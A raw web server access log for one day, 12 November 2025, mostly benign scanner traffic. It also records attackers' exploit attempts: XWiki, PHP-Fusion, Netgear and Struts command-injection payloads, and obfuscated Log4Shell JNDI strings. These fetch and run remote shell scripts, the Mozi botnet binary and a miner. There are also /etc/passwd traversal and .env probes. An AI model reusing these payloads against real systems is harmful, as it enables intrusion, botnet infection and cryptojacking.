167.94.146.54 - - [12/Nov/2025:00:14:08 +0100] "GET / HTTP/1.1" 200 1895 167.94.146.54 - - [12/Nov/2025:00:14:13 +0100] "-" 400 1930 167.94.146.54 - - [12/Nov/2025:00:14:13 +0100] "GET / HTTP/1.1" 200 1895 167.94.146.54 - - [12/Nov/2025:00:14:13 +0100] "GET /favicon.ico HTTP/1.1" 404 729 167.94.146.54 - - [12/Nov/2025:00:15:15 +0100] "-" 400 1930 167.94.146.54 - - [12/Nov/2025:00:15:16 +0100] "GET /wiki HTTP/1.1" 404 722 45.79.181.179 - - [12/Nov/2025:00:17:19 +0100] "GET / HTTP/1.1" 200 1895 147.185.132.144 - - [12/Nov/2025:00:19:35 +0100] "GET / HTTP/1.1" 200 1895 52.23.230.125 - - [12/Nov/2025:00:38:03 +0100] "GET / HTTP/1.1" 200 1895 45.79.181.251 - - [12/Nov/2025:00:43:43 +0100] "GET / HTTP/1.1" 200 1895 91.239.216.8 - - [12/Nov/2025:00:59:26 +0100] "GET / HTTP/1.1" 200 1895 45.43.33.218 - - [12/Nov/2025:01:14:25 +0100] "-" 400 1930 45.43.33.218 - - [12/Nov/2025:01:14:30 +0100] "GET / HTTP/1.1" 200 1895 147.185.132.118 - - [12/Nov/2025:01:22:10 +0100] "-" 400 1930 147.185.132.118 - - [12/Nov/2025:01:22:10 +0100] "-" 400 1930 64.62.156.10 - - [12/Nov/2025:01:25:12 +0100] "GET / HTTP/1.1" 200 1895 64.62.156.12 - - [12/Nov/2025:01:25:42 +0100] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.22 - - [12/Nov/2025:01:25:58 +0100] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.13 - - [12/Nov/2025:01:26:11 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 64.62.156.10 - - [12/Nov/2025:01:26:26 +0100] "GET /geoserver/web/ HTTP/1.1" 404 740 193.142.147.209 - - [12/Nov/2025:01:56:40 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 204.76.203.212 - - [12/Nov/2025:02:15:13 +0100] "GET / HTTP/1.1" 200 1895 94.74.182.143 - - [12/Nov/2025:02:22:11 +0100] "GET / HTTP/1.1" 200 1895 185.100.87.136 - - [12/Nov/2025:02:43:38 +0100] "-" 400 1930 185.100.87.136 - - [12/Nov/2025:02:43:38 +0100] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 176.65.149.19 - - [12/Nov/2025:03:00:57 +0100] "GET /login HTTP/1.1" 404 723 40.76.125.17 - - [12/Nov/2025:03:03:18 +0100] "GET / HTTP/1.1" 200 1895 40.76.125.17 - - [12/Nov/2025:03:03:18 +0100] "-" 400 1930 20.168.7.56 - - [12/Nov/2025:03:40:03 +0100] "-" 400 1930 193.142.147.209 - - [12/Nov/2025:04:06:04 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 176.65.148.214 - - [12/Nov/2025:04:27:10 +0100] "CONNECT www.baidu.com:443 HTTP/1.1" 400 804 193.26.115.195 - - [12/Nov/2025:04:42:16 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 193.26.115.195 - - [12/Nov/2025:04:42:16 +0100] "GET / HTTP/1.1" 200 1895 193.26.115.195 - - [12/Nov/2025:04:42:16 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 193.26.115.195 - - [12/Nov/2025:04:42:16 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 193.26.115.195 - - [12/Nov/2025:04:42:16 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 193.26.115.195 - - [12/Nov/2025:04:42:17 +0100] "GET /infusions/downloads/downloads.php?cat_id=$%7Bsystem(wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wcr.sh%7Csh)%7D HTTP/1.1" 404 759 193.26.115.195 - - [12/Nov/2025:04:56:44 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 193.26.115.195 - - [12/Nov/2025:04:56:44 +0100] "GET / HTTP/1.1" 200 1895 193.26.115.195 - - [12/Nov/2025:04:56:44 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 193.26.115.195 - - [12/Nov/2025:04:56:44 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 193.26.115.195 - - [12/Nov/2025:04:56:44 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 193.26.115.195 - - [12/Nov/2025:04:56:44 +0100] "GET /infusions/downloads/downloads.php?cat_id=$%7Bsystem(wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wcr.sh%7Csh)%7D HTTP/1.1" 404 759 94.74.182.143 - - [12/Nov/2025:05:19:05 +0100] "GET / HTTP/1.1" 200 1895 207.90.244.28 - - [12/Nov/2025:05:39:06 +0100] "GET / HTTP/1.1" 200 1895 207.90.244.28 - - [12/Nov/2025:05:39:08 +0100] "GET /favicon.ico HTTP/1.1" 404 729 178.128.167.90 - - [12/Nov/2025:06:22:03 +0100] "-" 400 1930 178.128.167.90 - - [12/Nov/2025:06:22:03 +0100] "-" 400 1930 178.128.167.90 - - [12/Nov/2025:06:22:03 +0100] "GET / HTTP/1.1" 200 1895 178.128.167.90 - - [12/Nov/2025:06:22:03 +0100] "GET /download/powershell/ HTTP/1.1" 404 746 178.128.167.90 - - [12/Nov/2025:06:22:03 +0100] "GET /get.php HTTP/1.1" 404 725 87.120.191.92 - - [12/Nov/2025:06:39:40 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country= HTTP/1.1" 404 756 94.74.182.143 - - [12/Nov/2025:06:39:54 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [12/Nov/2025:06:41:11 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 20.106.206.77 - - [12/Nov/2025:07:05:19 +0100] "-" 400 1930 65.49.1.172 - - [12/Nov/2025:07:41:18 +0100] "-" 400 1930 45.135.194.71 - - [12/Nov/2025:08:40:24 +0100] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 404 756 64.227.146.243 - - [12/Nov/2025:08:51:00 +0100] "GET /aaa9 HTTP/1.1" 404 722 64.227.146.243 - - [12/Nov/2025:08:51:03 +0100] "GET /aab8 HTTP/1.1" 404 722 64.227.146.243 - - [12/Nov/2025:08:51:07 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [12/Nov/2025:08:53:23 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 172.245.241.123 - - [12/Nov/2025:09:02:54 +0100] "GET / HTTP/1.1" 200 1895 156.232.94.17 - - [12/Nov/2025:09:47:24 +0100] "-" 400 1930 156.232.94.17 - - [12/Nov/2025:09:47:25 +0100] "-" 400 1930 156.232.94.17 - - [12/Nov/2025:09:47:25 +0100] "GET /v1/vector/collections/describe HTTP/1.1" 404 760 156.232.94.17 - - [12/Nov/2025:09:47:25 +0100] "GET /v1 HTTP/1.1" 404 720 156.232.94.17 - - [12/Nov/2025:09:47:26 +0100] "GET / HTTP/1.1" 200 1895 156.232.94.17 - - [12/Nov/2025:09:47:32 +0100] "GET / HTTP/1.1" 200 1895 156.232.94.17 - - [12/Nov/2025:09:47:33 +0100] "GET /favicon.ico HTTP/1.1" 404 729 196.251.87.155 - - [12/Nov/2025:10:42:19 +0100] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 404 756 193.142.147.209 - - [12/Nov/2025:11:21:14 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 194.165.16.11 - - [12/Nov/2025:11:24:17 +0100] "POST /json/setup-restore.action HTTP/1.1" 404 747 103.70.167.77 - - [12/Nov/2025:11:33:13 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.70.167.14:39914/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 194.165.16.11 - - [12/Nov/2025:11:34:47 +0100] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 1009 194.165.16.11 - - [12/Nov/2025:11:34:47 +0100] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d4a5prv49vdaa9kud8igk78i6zxeeoica.oast.fun%22%29%7D/ HTTP/1.1" 404 841 138.199.19.52 - - [12/Nov/2025:11:58:21 +0100] "CONNECT www.uni-konstanz.de:443 HTTP/1.1" 400 804 20.15.224.64 - - [12/Nov/2025:12:22:05 +0100] "GET / HTTP/1.1" 200 1895 20.15.224.64 - - [12/Nov/2025:12:22:05 +0100] "-" 400 1930 193.142.147.209 - - [12/Nov/2025:13:07:47 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 45.135.193.162 - - [12/Nov/2025:13:21:08 +0100] "GET /json/ HTTP/1.1" 404 727 45.135.193.162 - - [12/Nov/2025:13:21:08 +0100] "-" 400 1930 45.135.193.162 - - [12/Nov/2025:13:21:08 +0100] "-" 400 1930 162.142.125.118 - - [12/Nov/2025:13:49:26 +0100] "GET / HTTP/1.1" 200 1895 162.142.125.118 - - [12/Nov/2025:13:49:31 +0100] "-" 400 1930 162.142.125.118 - - [12/Nov/2025:13:49:31 +0100] "GET / HTTP/1.1" 200 1895 162.142.125.118 - - [12/Nov/2025:13:49:32 +0100] "GET /favicon.ico HTTP/1.1" 404 729 162.142.125.118 - - [12/Nov/2025:13:49:36 +0100] "-" 400 1930 162.142.125.118 - - [12/Nov/2025:13:49:37 +0100] "GET /security.txt HTTP/1.1" 404 730 79.13.124.129 - - [12/Nov/2025:13:56:39 +0100] "GET / HTTP/1.0" 200 1895 162.142.125.195 - - [12/Nov/2025:14:16:32 +0100] "-" 400 1930 162.142.125.195 - - [12/Nov/2025:14:16:37 +0100] "-" 400 1930 162.142.125.195 - - [12/Nov/2025:14:16:38 +0100] "GET / HTTP/1.1" 200 1895 162.142.125.195 - - [12/Nov/2025:14:16:40 +0100] "GET /favicon.ico HTTP/1.1" 404 729 162.142.125.195 - - [12/Nov/2025:14:16:46 +0100] "-" 400 1930 162.142.125.195 - - [12/Nov/2025:14:16:46 +0100] "GET /robots.txt HTTP/1.1" 404 728 138.197.146.82 - - [12/Nov/2025:14:53:15 +0100] "GET /.env HTTP/1.1" 404 722 138.197.146.82 - - [12/Nov/2025:14:53:15 +0100] "GET /.git/config HTTP/1.1" 404 733 193.142.147.209 - - [12/Nov/2025:15:06:03 +0100] "GET / HTTP/1.1" 200 1895 87.120.191.92 - - [12/Nov/2025:15:13:45 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country= HTTP/1.1" 404 756 91.196.152.81 - - [12/Nov/2025:15:34:30 +0100] "-" 400 1930 91.196.152.85 - - [12/Nov/2025:15:34:33 +0100] "GET / HTTP/1.1" 200 1895 91.230.168.207 - - [12/Nov/2025:15:41:06 +0100] "-" 400 1930 91.230.168.109 - - [12/Nov/2025:15:41:09 +0100] "GET / HTTP/1.1" 200 1895 91.196.152.224 - - [12/Nov/2025:15:41:25 +0100] "GET /favicon.ico HTTP/1.1" 404 729 91.230.168.194 - - [12/Nov/2025:15:48:12 +0100] "GET /favicon.ico HTTP/1.1" 404 729 193.142.147.209 - - [12/Nov/2025:16:41:26 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 18.97.5.109 - - [12/Nov/2025:16:47:47 +0100] "GET / HTTP/1.1" 200 1895 89.42.231.77 - - [12/Nov/2025:18:09:19 +0100] "GET /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 400 813 193.142.147.209 - - [12/Nov/2025:18:53:21 +0100] "GET / HTTP/1.1" 200 1895 78.41.63.6 - - [12/Nov/2025:19:09:40 +0100] "-" 400 1930 94.74.182.143 - - [12/Nov/2025:19:25:33 +0100] "GET / HTTP/1.1" 200 1895 185.251.217.117 - - [12/Nov/2025:19:57:34 +0100] "GET / HTTP/1.1" 200 1895 94.74.182.143 - - [12/Nov/2025:20:42:33 +0100] "GET / HTTP/1.1" 200 1895 3.149.59.26 - - [12/Nov/2025:20:46:31 +0100] "GET / HTTP/1.1" 200 1895 3.149.59.26 - - [12/Nov/2025:20:48:11 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [12/Nov/2025:20:56:57 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 3.134.148.59 - - [12/Nov/2025:21:24:57 +0100] "GET / HTTP/1.1" 200 1895 3.134.148.59 - - [12/Nov/2025:21:26:49 +0100] "GET / HTTP/1.1" 200 1895 3.134.148.59 - - [12/Nov/2025:21:30:56 +0100] "-" 400 1930 3.134.148.59 - - [12/Nov/2025:21:32:55 +0100] "-" 400 1930 3.134.148.59 - - [12/Nov/2025:21:34:03 +0100] "-" 400 1930 165.154.218.158 - - [12/Nov/2025:22:15:30 +0100] "-" 400 1930 165.154.218.158 - - [12/Nov/2025:22:15:40 +0100] "GET / HTTP/1.1" 200 1895 165.154.218.158 - - [12/Nov/2025:22:15:59 +0100] "GET /favicon.ico HTTP/1.1" 404 729 165.154.218.158 - - [12/Nov/2025:22:15:59 +0100] "GET /robots.txt HTTP/1.1" 404 728 165.154.218.158 - - [12/Nov/2025:22:15:59 +0100] "GET /sitemap.xml HTTP/1.1" 404 729 165.154.218.158 - - [12/Nov/2025:22:16:00 +0100] "GET /config.json HTTP/1.1" 404 729 149.86.227.16 - - [12/Nov/2025:22:16:35 +0100] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//94.183.233.198:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMzEuNTYuMjcuOTcvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7IHdnZXQgLXFPLSBodHRwOi8vMzEuNTYuMjcuOTcvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM=%7D%27%29 HTTP/1.1" 404 1086 149.86.227.16 - - [12/Nov/2025:22:25:29 +0100] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//94.183.233.198:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMzEuNTYuMjcuOTcvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7IHdnZXQgLXFPLSBodHRwOi8vMzEuNTYuMjcuOTcvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM=%7D%27%29 HTTP/1.1" 404 1086 149.86.227.16 - - [12/Nov/2025:22:37:42 +0100] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//94.183.233.198:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMzEuNTYuMjcuOTcvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7IHdnZXQgLXFPLSBodHRwOi8vMzEuNTYuMjcuOTcvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM=%7D%27%29 HTTP/1.1" 404 1086 193.142.147.209 - - [12/Nov/2025:22:45:19 +0100] "GET / HTTP/1.1" 200 1895 18.223.33.131 - - [12/Nov/2025:22:45:27 +0100] "GET / HTTP/1.1" 200 1895 94.74.182.143 - - [12/Nov/2025:22:50:47 +0100] "GET / HTTP/1.1" 200 1895 149.86.227.16 - - [12/Nov/2025:23:30:57 +0100] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//94.183.233.198:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMzEuNTYuMjcuOTcvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7IHdnZXQgLXFPLSBodHRwOi8vMzEuNTYuMjcuOTcvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM=%7D%27%29 HTTP/1.1" 404 1086 193.26.115.195 - - [12/Nov/2025:23:32:05 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 193.26.115.195 - - [12/Nov/2025:23:32:06 +0100] "GET / HTTP/1.1" 200 1895 193.26.115.195 - - [12/Nov/2025:23:32:06 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 193.26.115.195 - - [12/Nov/2025:23:32:06 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 193.26.115.195 - - [12/Nov/2025:23:32:06 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 193.26.115.195 - - [12/Nov/2025:23:32:06 +0100] "GET /infusions/downloads/downloads.php?cat_id=$%7Bsystem(wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wcr.sh%7Csh)%7D HTTP/1.1" 404 759